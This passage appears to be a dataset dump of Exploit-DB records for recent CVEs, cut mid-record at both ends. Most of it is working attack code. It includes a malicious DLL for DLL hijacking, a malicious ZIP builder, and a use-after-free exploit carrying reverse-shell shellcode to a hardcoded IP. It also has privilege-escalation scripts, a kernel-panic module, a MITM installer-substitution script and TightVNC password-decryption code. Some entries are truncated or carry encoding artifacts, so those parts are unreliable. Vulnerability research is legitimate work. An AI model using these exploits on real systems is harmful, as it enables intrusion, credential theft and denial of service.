Execution\n# Author: Skander BELABED - Magellan Sécurité\n# Date: 07/11/2025\n# Vendor: TOTOLINK\n# Product: N300RB\n# Firmware version: 8.54\n# CVE: CVE-2025-52089\n\n## Description:\nA hidden remote support feature protected by a static secret in TOTOLINK\nN300RB firmware version 8.54 allows an authenticated attacker to execute\narbitrary OS commands with root privileges.\n\n# Reproduce:\n[href](\nhttps://0x09.dev/posts/toto_decouvre_une_interface_de_debug/)", "cve_id": "CVE-2025-52089", "source": "exploitdb", "timestamp": "2025-07-16T00:00:00+00:00"} {"id": "141ef4e538937cd74c9d", "text": "7-Zip 24.00 - Directory Traversal\n\n# Exploit Title: 7-Zip < 25.00 - Directory Traversal to RCE via Malicious ZIP\n# Date: 2025-11-22\n# Author: Mohammed Idrees Banyamer\n# Author Country: Jordan\n# Instagram: @banyamer_security\n# GitHub: https://github.com/mbanyamer\n# Vendor Homepage: https://www.7-zip.org\n# Software Link: https://www.7-zip.org/download.html\n# Version: 7-Zip < 25.00\n# Tested on: Windows 10 / Windows 11 (7-Zip 24.xx)\n# CVE: CVE-2025-11001\n# CVSS: 8.8 (High) - draft estimation\n# Category: Local Privilege Escalation / Remote Code Execution\n# Platform: Windows\n# CRITICAL: Yes - Public exploit available, active exploitation reported\n# Including: Directory Traversal via crafted symlink entry in ZIP archive\n# Impact: Full system compromise when extracting malicious archive with 7-Zip as Administrator\n# Fix: Upgrade to 7-Zip 25.00 or later\n# Advisory: https://www.7-zip.org/history.txt\n# Patch: https://github.com/ip7z/7zip/releases/tag/25.00\n# Target: Windows systems running vulnerable 7-Zip versions\n\nimport struct\nimport os\nimport argparse\nimport sys\n\ndef build_zip(target_path, payload_file, output_zip):\n if not os.path.isfile(payload_file):\n print(f\"[-] Payload file not found: {payload_file}\")\n sys.exit(1)\n\n payload_name = os.path.basename(payload_file)\n payload_data = open(payload_file, \"rb\").read()\n\n target = target_path.replace(\"\\\\\", \"/\").strip(\"/\") + \"/\"\n traversal = \"../../../../\" + target\n\n with open(output_zip, \"wb\") as f:\n offset = 0\n\n symlink_name = \"evil.lnk\"\n symlink_target = traversal.encode() + b\"\\x00\"\n symlink_extra = struct.pack(\" type project\n\n P R O J E C T\n\n .|\n | |\n |'| ._____\n ___ | | |. |' .---\"|\n _ .-' '-. | | .--'| || | _| |\n .-'| _.| | || '-__ | | | || |\n |' | |. | || | | | | || |\n ____| '-' ' \"\" '-' '-.' '` |____\n░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░\n ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░\n\n\nC:\\Aspect\\Aspect-Studio-3.08.03> del CylonLicence.dll\nC:\\Aspect\\Aspect-Studio-3.08.03> type aspect.bat\nREM 64bit parameters\njre\\bin\\javaw -Dormlite.networkpoint.load=true -Dfile.encoding=\"UTF-8\" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar\n\nC:\\Aspect\\Aspect-Studio-3.08.03-a09>aspect.bat\n\nC:\\Aspect\\Aspect-Studio-3.08.03-a09>REM 64bit parameters\n\nC:\\Aspect\\Aspect-Studio-3.08.03-a09>jre\\bin\\javaw -Dormlite.networkpoint.load=true -Dfile.encoding=\"UTF-8\" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar\n\n\nC:\\Aspect\\Aspect-Studio-3.08.03> type AspectStudio.class\n...\n...\nSystem.loadLibrary(\"CylonLicence\");\n} catch (Throwable t) {}\nLoggerUtil.logger.error(\"Error loading license DLL\", t);\n}\n}\n...\n...\n\nC:\\Aspect\\Aspect-Studio-3.08.03> cd logs\nC:\\Aspect\\Aspect-Studio-3.08.03\\logs>type AspectStudio.log\n\nERROR: 2025-01-16 16:47:58,579 Error loading license DLL [main]\njava.lang.UnsatisfiedLinkError: no CylonLicence in java.library.path\n at java.lang.ClassLoader.loadLibrary(ClassLoader.java:1867)\n at java.lang.Runtime.loadLibrary0(Runtime.java:870)\n at java.lang.System.loadLibrary(System.java:1122)\n at com.aamatrix.util.AspectStudio.(AspectStudio.java:42)\n at com.aamatrix.vib.rrobin.CylonLicense.(CylonLicense.java:18)\n at com.aamatrix.vib.rrobin.LicenseService.(LicenseService.java:38)\n at com.aamatrix.vib.rrobin.LicenseService.(LicenseService.java:34)\n at com.aamatrix.projectmanager.AspectStudio.(AspectStudio.java:52)\n at java.lang.Class.forName0(Native Method)\n at java.lang.Class.forName(Class.java:348)\n at com.aamatrix.projectmanager.AspectStudioLauncher.main(AspectStudioLauncher.java:70)\n ...\n ...\n\nC:\\DLL-Mala> type CylonLicence.cpp\n\n#define WIN32_LEAN_AND_MEAN\n#include \n#include \n\n\nextern \"C\" __declspec(dllexport)\nDWORD WINAPI ExecuteCmdThread(LPVOID lpParam) {\n ShellExecuteW(NULL, L\"open\", L\"cmd.exe\", L\"/c start\", NULL, SW_SHOWNORMAL);\n return 0;\n}\n\nextern \"C\" __declspec(dllexport)\nBOOL APIENTRY DllMain(HMODULE hModule,\n DWORD ul_reason_for_call,\n LPVOID lpReserved) {\n switch (ul_reason_for_call) {\n case DLL_PROCESS_ATTACH:\n CreateThread(NULL, 0, ExecuteCmdThread, NULL, 0, NULL);\n break;\n case DLL_THREAD_ATTACH:\n case DLL_THREAD_DETACH:\n case DLL_PROCESS_DETACH:\n break;\n }\n return TRUE;\n}", "cve_id": "CVE-2024-13946", "source": "exploitdb", "timestamp": "2025-05-25T00:00:00+00:00"} {"id": "1307197a21085e84afe0", "text": "Docker Desktop 4.44.3 - Unauthenticated API Exposure\n\n# Exploit Title: Docker Desktop 4.44.3 - Unauthenticated API Exposure\n# Date: 2025-10-06\n# Exploit Author: OilSeller2001\n# Vendor Homepage: https://www.docker.com/\n# Software Link: https://www.docker.com/products/docker-desktop/\n# Version: Affected on Windows and macOS versions prior to 4.44.3\n# Tested on: Windows 11 + Docker Desktop 4.43.0\n# Exploit Type: Remote, Local, Shellcode\n# Platform: Windows\n# CVE: CVE-2025-9074\n\n# Description:\nThis PoC script exploits a security misconfiguration in the unauthenticated exposure of the Docker Engine API.\nBy sending crafted API requests directly to the Docker daemon, the script creates and starts a specially prepared container.\nThe container leverages the bind mount feature to map sensitive directories from the host filesystem into the container, effectively granting arbitrary access to the host.\nThis results in a high-privilege remote code execution scenario.\n\n# Vulnerability Details:\nThe Docker Engine API (TCP port 2375) can be exposed without TLS authentication via the \"Expose daemon on tcp://localhost:2375 without TLS\" option in Docker Desktop.\nIf this option is enabled, any local or remote attacker with network access to the exposed port can control the Docker daemon without authentication.\n\n# Usage:\n1. Expose the Docker daemon on TCP 2375 without TLS (testing environment only).\n2. Run the PoC against the target:\n python3 poc_cve_2025_9074.py :2375\n3. The script will:\n - Check API availability\n - Pull an image\n - Create a malicious container with bind mounts to the host filesystem\n - Start the container, allowing access to host files\n\n# Mitigation:\n- Disable the unauthenticated Docker API exposure after testing.\n- Use TLS certificates if remote API access is required.\n- Restrict network access to port 2375 via firewall rules.\n\n# PoC Download Link:\nhttps://github.com/OilSeller2001/PoC-for-CVE-2025-9074", "cve_id": "CVE-2025-9074", "source": "exploitdb", "timestamp": "2026-02-04T00:00:00+00:00"} {"id": "1c56b7579bbbbf715430", "text": "Mbed TLS 3.6.4 - Use-After-Free\n\n/*\n * Exploit Title: Mbed TLS 3.6.4 - Use-After-Free\n * Google Dork: N/A\n * Date: 2025-08-29\n * Exploit Author: Byte Reaper\n * Vendor Homepage: https://github.com/Mbed-TLS/mbedtls\n * Software Link: https://github.com/Mbed-TLS/mbedtls\n * Version: ≤ 3.6.4\n * Tested on: Kali Linux\n * CVE: CVE-2025-47917\n*/\n#include\n#include\n#include \n#include \n#include \n#include \n#include \"mbedtls/asn1.h\"\n#include \n#include \n#include \n#include \n#define _GNU_SOURCE\ntypedef struct\n{\n unsigned char *pointer;\n size_t pointerLen;\n}shell;\ntypedef struct fake_named_data\n{\n struct fake_named_data *next;\n mbedtls_asn1_buf oid;\n mbedtls_asn1_buf val;\n} fake_named_data;\nvoid eS()\n{\n __asm__ volatile\n (\n \"xor %%rdi, %%rdi\\n\\t\"\n \"mov $0x3C, %%rax\\n\\t\"\n \"syscall\\n\\t\"\n :\n :\n :\"rax\", \"rdi\"\n );\n}\n\nvoid checkAslr()\n{\n FILE *f = fopen(\"/proc/sys/kernel/randomize_va_space\", \"r\");\n if (!f)\n {\n perror(\"\\e[1;31m[-] Error Open File !\");\n eS();\n }\n\n int val;\n if (fscanf(f,\n \"%d\",\n &val) != 1)\n {\n printf(\"\\e[1;31m[-] Failed to read ASLR status.\\e[0m\\n\");\n fclose(f);\n eS();\n }\n\n fclose(f);\n\n if (val != 0)\n {\n printf(\"\\e[1;31m[-] ASLR is enabled (value=%d). This may prevent reliable exploitation.\\e[0m\\n\", val);\n printf(\"[\\e[1;31m-] Please disable ASLR temporarily using: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space\\n\");\n printf(\"\\e[1;31m[-] Exiting to avoid crash.\\e[0m\\n\");\n eS();\n }\n\n printf(\"\\e[1;36m[+] ASLR is disabled (value=0). Environment looks good.\\e[0m\\n\");\n}\n\nshell inject()\n{\n // ip : 192.168.92.187\n // port : 4454\n unsigned char shellcode[] =\n {\n 0x48, 0x31, 0xd2, 0xb8, 0x29, 0x00, 0x00, 0x00, 0xbe, 0x01, 0x00, 0x00,\n 0x00, 0xbf, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x89, 0xc7, 0x49,\n 0x89, 0xc4, 0x48, 0x83, 0xec, 0x10, 0xc7, 0x44, 0x24, 0x0c, 0xbd, 0x5c,\n 0xa8, 0xc0, 0x66, 0xc7, 0x44, 0x24, 0x0a, 0x11, 0xc1, 0x66, 0xc7, 0x44,\n 0x24, 0x08, 0x02, 0x00, 0x48, 0x89, 0xe6, 0xba, 0x10, 0x00, 0x00, 0x00,\n 0xb8, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x4c, 0x89, 0xe7, 0xbe, 0x02,\n 0x00, 0x00, 0x00, 0xb8, 0x21, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xff,\n 0xce, 0x79, 0xf4, 0x48, 0x31, 0xd2, 0x48, 0xb8, 0x62, 0x2f, 0x73, 0x62,\n 0x61, 0x73, 0x68, 0x00, 0x50, 0x48, 0xb8, 0x2f, 0x75, 0x73, 0x72, 0x2f,\n 0x62, 0x69, 0x6e, 0x50, 0x48, 0x89, 0xe7, 0x52, 0x57, 0x48, 0x89, 0xe6,\n 0xb8, 0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05\n };\n size_t shellcodeLen = sizeof(shellcode);\n shell a =\n {\n\n shellcode,\n shellcodeLen\n\n };\n\n void *page = mmap(NULL, a.pointerLen,\n PROT_READ|PROT_WRITE|PROT_EXEC,\n MAP_ANON|MAP_PRIVATE, -1, 0);\n memcpy(page, a.pointer, a.pointerLen);\n\n a.pointer = page;\n return a;\n\n}\nvoid paddingChunk(void *fakeP, size_t len)\n{\n for (int i = 0; i < 10000; i++)\n {\n void *p = malloc(len);\n size_t usable = malloc_usable_size(p);\n memcpy(p, fakeP, len);\n memset((char*)p + len, 0, usable - len);\n }\n}\n\nvoid pointerHead(mbedtls_asn1_named_data *head)\n{\n\n if (head->val.p == NULL)\n {\n printf(\"\\e[1;91m[-] Pointer ShellCode Is NULl !!\\e[0m\\n\");\n eS();\n }\n printf(\"\\e[1;36m[*] Jumping to shellcode at %p\\e[0m\\n\", head->val.p);\n void (*u)() = (void(*)()) head->val.p;\n u();\n\n}\nvoid tls()\n{\n mbedtls_asn1_named_data *head = NULL;\n printf(\"\\e[1;34m[+] Create Head Successfully !\\e[0m\\n\");\n printf(\"\\e[1;35m[*] head before first call: %p\\e[0m\\n\", head);\n int value = mbedtls_x509_string_to_names(&head, \"CN=AAAA\");\n shell a = inject();\n void *exec_mem = a.pointer;\n fake_named_data data =\n {\n .next = NULL,\n .oid =\n {\n .p = (unsigned char*) MBEDTLS_OID_AT_CN,\n .len = sizeof(MBEDTLS_OID_AT_CN) - 1 },\n .val =\n {\n .p = a.pointer,\n .len = a.pointerLen\n }\n };\n printf(\"\\e[1;35m[*] head after first call: %p (value=%d)\\e[0m\\n\", head, value);\n\n paddingChunk(&data, sizeof(mbedtls_asn1_named_data));\n printf(\"\\e[1;34m[+] Use heap spray...\\e[0m\\n\");\n\n usleep(500000);\n if (value == MBEDTLS_ERR_X509_INVALID_NAME)\n {\n printf(\"\\e[1;31m[-] Invaild Name (Med Tls Name)!\\e[0m\\n\");\n printf(\"[\\e[1;31m-] Value => (MBEDTLS_ERR_X509_INVALID_NAME)\\e[0m\\n\");\n printf(\"\\e[1;31m[-] Exit (sys_exit)...\\e[0m\\n\");\n eS();\n }\n printf(\"\\e[1;35m[*] head before second call: %p\\e[0m\\n\", head);\n int value2 = mbedtls_x509_string_to_names(&head, \"CN=AAAA,CN=BBBB\");\n printf(\"\\e[1;35m[*] head after second call: %p (value=%d)\\e[0m\\n\", head, value2);\n printf(\"\\e[1", "cve_id": "CVE-2025-47917", "source": "exploitdb", "timestamp": "2025-09-16T00:00:00+00:00"} {"id": "d1dc47326ed2eb3c9187", "text": "Microsoft Defender for Endpoint (MDE) - Elevation of Privilege\n\n#!/bin/bash\n# Exploit Title: Microsoft Defender for Endpoint (MDE) - Elevation of Privilege\n# Date: 2025-05-27\n# Exploit Author: Rich Mirch\n# Vendor Homepage: https://learn.microsoft.com/en-us/defender-endpoint/\n# Software Link:\nhttps://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-endpoint-linux\n# Versions:\n# Vulnerable March-2025 Build: 101.25012.0000 30.125012.0000.0\n# Vulnerable Feb-2025 Build: 101.24122.0008 20.124112.0008.0\n# Vulnerable Feb-2025 Build: 101.24112.0003 30.124112.0003.0\n# Vulnerable Jan-2025 Build: 101.24112.0001 30.124112.0001.0\n# Vulnerable Jan-2025 Build: 101.24102.0000 30.124102.0000.0\n#\n# Vendor Advisory:\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47161\n# Blog: http://stratascale.com/vulnerability-alert-cve202547161\n# Tested on: Ubuntu 24.04.1 LTS and 24.04.2 LTS\n# CVE : CVE-2025-47161\n#\necho \"MDE Version: $(mdatp version)\"\n\n# stage\ncat >mde-exp.c<\n#include \n#include \n#include \n\nvoid woot(){\n // for manual testing\n if(isatty(STDERR_FILENO)) {\n fprintf(stderr,\"Woot!\\n\");\n }\n system(\"ps -ef > /woot.txt\");\n sleep(3000000);\n}\n\nEOF\n\n# build exploit\ngcc -fPIC -o woot.o -Wall -c mde-exp.c\ngcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o\n\nmkdir -p /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/\n\ncat > /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/openssl.cnf\n<sc qc InboxProcessor\n[SC] QueryServiceConfig SUCCESS\n\nSERVICE_NAME: InboxProcessor\n TYPE : 10 WIN32_OWN_PROCESS\n START_TYPE : 2 AUTO_START\n ERROR_CONTROL : 1 NORMAL\n BINARY_PATH_NAME : C:\\inetpub\\wwwroot\\InboxProcessor\\Netbt.Inbox.Process.exe\n LOAD_ORDER_GROUP :\n TAG : 0\n DISPLAY_NAME : InboxProcessor\n DEPENDENCIES :\n SERVICE_START_NAME : LocalSystem\n\n\nC:\\Users\\efatura\\Desktop>accesschk.exe /accepteula -uwdq \"C:\\inetpub\\wwwroot\\InboxProcessor\\\"\n\nAccesschk v6.15 - Reports effective permissions for securable objects\nCopyright (C) 2006-2022 Mark Russinovich\nSysinternals - www.sysinternals.com\n\nC:\\inetpub\\wwwroot\\InboxProcessor\n RW BUILTIN\\Users\n RW NT SERVICE\\TrustedInstaller\n RW NT AUTHORITY\\SYSTEM\n RW BUILTIN\\Administrators", "cve_id": "CVE-2025-14018", "source": "exploitdb", "timestamp": "2026-04-10T00:00:00+00:00"} {"id": "9159cc4b413505b7af2c", "text": "Parrot and DJI variants Drone OSes - Kernel Panic Exploit\n\n#!/usr/bin/env python3\n# Exploit Title: Parrot and DJI variants Drone OSes - Kernel Panic Exploit\n# Author: Mohammed Idrees Banyamer\n# Instagram: @banyamer_security\n# GitHub: https://github.com/mbanyamer\n# Date: 2025-06-10\n# Tested on: Parrot QRD, Parrot Alpha-M, DJI QRD, DJI Alpha-M\n# CVE: CVE-2025-37928\n# Type: Local Privilege Escalation / Kernel Panic\n# Platform: Linux-based drone OS (Parrot and DJI variants)\n# Author Country: Jordan\n# CVSS v3.1 Score: 7.3 (Important)\n# Weakness: CWE-284: Improper Access Control\n# Attack Vector: Local\n# User Interaction: None\n# Scope: Unchanged\n# Confidentiality, Integrity, Availability Impact: High (Denial of Service via Kernel Panic)\n# Exploit Code Maturity: Proof of Concept\n# Remediation Level: Official Fix Available\n#\n# Description:\n# This PoC triggers a kernel panic by calling schedule() inside an atomic context,\n# exploiting CVE-2025-37928 present in certain Linux kernels running on\n# Parrot QRD, Parrot Alpha-M, DJI QRD, and DJI Alpha-M drone operating systems.\n#\n# Steps of exploitation:\n# 1. Check if running as root.\n# 2. Verify kernel version vulnerability.\n# 3. Detect drone type from system files.\n# 4. Build and load vulnerable kernel module.\n# 5. Trigger kernel panic by scheduling a tasklet calling schedule() in atomic context.\n#\n# Affected Drone Versions:\n# - Parrot QRD\n# - Parrot Alpha-M (DT)\n# - DJI QRD\n# - DJI Alpha-M (DT)\n#\n# ------------------------------------------------------------------------------\n# Usage:\n# sudo python3 cve_2025_37928_tool.py [OPTIONS]\n#\n# Options:\n# --dry-run Run detection & build only (no module loading)\n# --force Force exploit even if kernel not detected as vulnerable\n# --cleanup-only Remove the kernel module without triggering panic\n# --verbose Enable detailed logging and debug output\n# --help Show usage information\n#\n# Examples:\n# sudo python3 cve_2025_37928_tool.py --dry-run\n# sudo python3 cve_2025_37928_tool.py\n# sudo python3 cve_2025_37928_tool.py --force\n# sudo python3 cve_2025_37928_tool.py --cleanup-only\n#\n# Warning:\n# This PoC causes an immediate kernel panic.\n# Use it ONLY in isolated and controlled environments (e.g., lab tests).\n# ------------------------------------------------------------------------------\n\nimport os\nimport sys\nimport subprocess\nimport tempfile\nimport argparse\nimport shutil\nimport platform\n\nMODULE_NAME = \"cve_2025_37928_poc\"\nC_FILENAME = MODULE_NAME + \".c\"\nKO_FILENAME = MODULE_NAME + \".ko\"\n\nKERNEL_MODULE_CODE = r'''\n#include \n#include \n#include \n#include \n#include \n\nMODULE_LICENSE(\"GPL\");\nMODULE_AUTHOR(\"PoC Author\");\nMODULE_DESCRIPTION(\"PoC for CVE-2025-37928: schedule() in atomic context causes kernel panic\");\n\nstatic void trigger_panic_tasklet(unsigned long data)\n{\n pr_alert(\"[CVE-2025-37928] Executing schedule() inside atomic context. This will panic!\\n\");\n schedule(); // This causes kernel panic\n}\n\nDECLARE_TASKLET(my_tasklet, trigger_panic_tasklet, 0);\n\nstatic int __init poc_init(void)\n{\n pr_info(\"[CVE-2025-37928] Loading PoC module and scheduling tasklet...\\n\");\n tasklet_schedule(&my_tasklet);\n return 0;\n}\n\nstatic void __exit poc_exit(void)\n{\n tasklet_kill(&my_tasklet);\n pr_info(\"[CVE-2025-37928] PoC module unloaded\\n\");\n}\n\nmodule_init(poc_init);\nmodule_exit(poc_exit);\n'''\n\nMAKEFILE_CONTENT = f'''\nobj-m += {MODULE_NAME}.o\n\nall:\n\\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules\n\nclean:\n\\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean\n'''\n\ndef check_root():\n if os.geteuid() != 0:\n print(\"[-] Must be run as root.\")\n sys.exit(1)\n\ndef detect_kernel():\n version = platform.release()\n vulnerable_versions = [\"5.10\", \"5.15\", \"6.0\"]\n vulnerable = any(v in version for v in vulnerable_versions)\n print(f\"[i] Kernel version: {version} => {'VULNERABLE' if vulnerable else 'UNKNOWN/SAFE'}\")\n return vulnerable\n\ndef detect_drone_type():\n print(\"[*] Detecting drone type...\")\n files = [\"/etc/drone_type\", \"/proc/device-tree/model\", \"/sys/firmware/devicetree/base/model\"]\n found = []\n for path in files:\n if os.path.exists(path):\n try:\n with open(path, \"r\") as f:\n content = f.read().strip()\n if any(x in content for x in [\"Parrot\", \"DJI\"]):\n found.append(content)\n except:\n continue\n if found:\n for d in found:\n print(f\" [i] Found: {d}\")\n else:\n print(\" [!] No drone ID found.\")\n return found\n\ndef write_module(tempdir):\n c_path = os.path.join(tempdir, C_FILENAME)\n makefile_path = os.path.join(tempdir, \"Makefile\")\n with open(c_path, \"w\") as f:\n f.write(KERNEL_MODULE_CODE)\n with open(makefile_path, \"w\") as f:\n f.write(MAKEFILE_CONTENT)\n return c_path\n", "cve_id": "CVE-2025-37928", "source": "exploitdb", "timestamp": "2025-06-15T00:00:00+00:00"} {"id": "dc73a8a994fb423ccf66", "text": "qBittorrent 5.0.1 - MITM RCE\n\n# Exploit Title: qBittorrent 5.0.1 MITM RCE\n# Date: 01/02/2025\n# Exploit Author: Jordan Sharp\n# Vendor Homepage: https://github.com/qbittorrent/qBittorrent\n# Software Link: https://www.qbittorrent.org/download\n# Version: < 5.0.1\n# Tested on: Windows 10\n# CVE : CVE-2024-51774\n\nRun the PoC on a MITM machine intercepting the host\n\n\"\"\"PoC exploit for CVE-2024-51774\"\"\"\nfrom mitmproxy import http\n\ntargets = [\n \"https://www.python.org/ftp/python/3.10.11/python-3.10.11-amd64.exe\",\n \"https://www.python.org/ftp/python/3.8.10/python-3.8.10-amd64.exe\",\n \"https://www.python.org/ftp/python/3.10.11/python-3.10.11.exe\",\n \"https://www.python.org/ftp/python/3.8.10/python-3.8.10.exe\",\n \"https://www.python.org/ftp/python/3.4.3/python-3.4.3.msi\",\n \"https://www.python.org/ftp/python/3.8.5/python-3.8.5-amd64.exe\",\n \"https://www.python.org/ftp/python/3.8.5/python-3.8.5.exe\",\n \"https://www.python.org/ftp/python/3.8.1/python-3.8.1-amd64.exe\",\n \"https://www.python.org/ftp/python/3.8.1/python-3.8.1.exe\",\n \"https://www.python.org/ftp/python/3.7.4/python-3.7.4-amd64.exe\",\n \"https://www.python.org/ftp/python/3.7.4/python-3.7.4.exe\",\n \"https://www.python.org/ftp/python/3.6.6/python-3.6.6.exe\",\n \"https://www.python.org/ftp/python/3.12.4/python-3.12.4-amd64.exe\",\n \"https://www.python.org/ftp/python/3.4.4/python-3.4.4.msi\",\n \"https://www.python.org/ftp/python/3.5.2/python-3.5.2.exe\"\n]\n\nSUBSTITUTE_URL = \"http://192.168.50.2:6666/calc.exe\"\n\ndef request(flow: http.HTTPFlow) -> None:\n \"\"\"\n Inject any exe instead of a Python installer.\n \"\"\"\n if flow.request.pretty_url in targets:\n flow.request.url = SUBSTITUTE_URL", "cve_id": "CVE-2024-51774", "source": "exploitdb", "timestamp": "2025-04-11T00:00:00+00:00"} {"id": "a275cc8a007f3c5d6ca4", "text": "TightVNC 2.8.83 - Control Pipe Manipulation\n\n# Exploit Title: TightVNC 2.8.83 - Control Pipe Manipulation\n# Date: 06/09/2025\n# Exploit Author: Ionut Zevedei (mail@izvd.eu)\n# Exploit Repository: https://github.com/zeved/CVE-2024-42049-PoC\n# Vendor Homepage: https://www.tightvnc.com/\n# Software Link: https://www.tightvnc.com/download.php\n# Version: 2.8.83\n# Tested on: Windows 10 x64 - TightVNC 2.5.10, 2.8.81\n# CVE : CVE-2024-42049\n\n#include =20\n#include \n#include \n#include \n#include \"descrypt.h\"\n\n#define GETBYTE(x, n) (((x) >> ((n) * 8)) & 0xFF)\n#define BUFFER_SIZE 512\n\n#define TVNC_CMD_DISCONNECT_ALL_CLIENTS 0x06\n#define TVNC_CMD_GET_CLIENT_LIST 0x04\n#define TVNC_CMD_SHUTDOWN_SERVER 0x07\n#define TVNC_CMD_GET_SERVER_INFO 0x11\n#define TVNC_CMD_GET_CONFIG 0x12\n\nconst unsigned int commands[6] =3D {\n TVNC_CMD_DISCONNECT_ALL_CLIENTS,\n TVNC_CMD_GET_CLIENT_LIST,\n TVNC_CMD_SHUTDOWN_SERVER,\n TVNC_CMD_GET_SERVER_INFO,\n TVNC_CMD_GET_CONFIG,\n};\n\nunsigned char des_key[8] =3D { 23, 82, 107, 6, 35, 78, 88, 7 };\n\nvoid get_bytes(unsigned int data, unsigned char* out) {\n out[0] =3D GETBYTE(data, 3);\n out[1] =3D GETBYTE(data, 2);\n out[2] =3D GETBYTE(data, 1);\n out[3] =3D GETBYTE(data, 0);\n}\n\n// printf is wonky when printing passwords later\nvoid print_passwd(unsigned char* passwd) {\n for (int i =3D 0; i < 8; i++) {\n printf(\"%c\", passwd[i]);\n }\n printf(\"\\n\");\n}\n\nvoid print_error(unsigned long error_code) {\n unsigned char* buffer;\n =20\n // damn it windows...\n FormatMessage(\n FORMAT_MESSAGE_ALLOCATE_BUFFER |\n FORMAT_MESSAGE_FROM_SYSTEM |\n FORMAT_MESSAGE_IGNORE_INSERTS,\n NULL,\n error_code,\n MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),\n (LPTSTR) &buffer,\n 0, NULL);\n\n printf(\"[error]: %s\\n\", buffer);\n}\n\nvoid decrypt_passwords(unsigned char *buffer_ptr, unsigned int offset) {\n unsigned char primary_passwd[8] =3D { 0x00 };\n unsigned char view_only_passwd[8] =3D { 0x00 };\n\n printf(\"\\n\\tencrypted primary password: \");\n for (int i =3D 0; i < 8; i++) {\n primary_passwd[i] =3D buffer_ptr[offset + 8 + i];\n printf(\"%02x \", primary_passwd[i]);\n }\n printf(\"\\n\\tencrypted view-only password: \");\n for (int i =3D 0; i < 8; i++) {\n view_only_passwd[i] =3D buffer_ptr[offset + i];\n printf(\"%02x \", view_only_passwd[i]);\n }\n\n\n unsigned char primary_passwd_decrypted[8] =3D { 0x00 };\n unsigned char view_only_passwd_decrypted[8] =3D { 0x00 };\n\n decrypt(primary_passwd_decrypted, view_only_passwd,\n sizeof(primary_passwd_decrypted), des_key);\n decrypt(view_only_passwd_decrypted, primary_passwd,\n sizeof(view_only_passwd_decrypted), des_key);\n\n printf(\"\\n\\tdecrypted primary password: \");\n print_passwd(primary_passwd_decrypted);\n printf(\"\\tdecrypted view-only password: \");\n print_passwd(view_only_passwd_decrypted);\n}\n\nBOOL open_pipe(PHANDLE handle_ptr, char *pipe_name) {\n unsigned long pipe_mode;\n BOOL result =3D FALSE;\n printf(\"[~] opening pipe %s...\\n\", pipe_name);\n\n while (1) {\n *handle_ptr =3D CreateFile(\n pipe_name,\n GENERIC_READ | GENERIC_WRITE,\n 0,\n NULL,\n OPEN_EXISTING,\n FILE_FLAG_OVERLAPPED,\n NULL\n );\n\n if (*handle_ptr !=3D INVALID_HANDLE_VALUE) {\n printf(\"[+] pipe opened\\n\");\n break;\n }\n\n if (GetLastError() !=3D ERROR_PIPE_BUSY) {\n printf(\"[-] could not open pipe\\n\");\n print_error(GetLastError());\n return FALSE;\n }\n\n printf(\"[~] waiting for named pipe to be available - if this 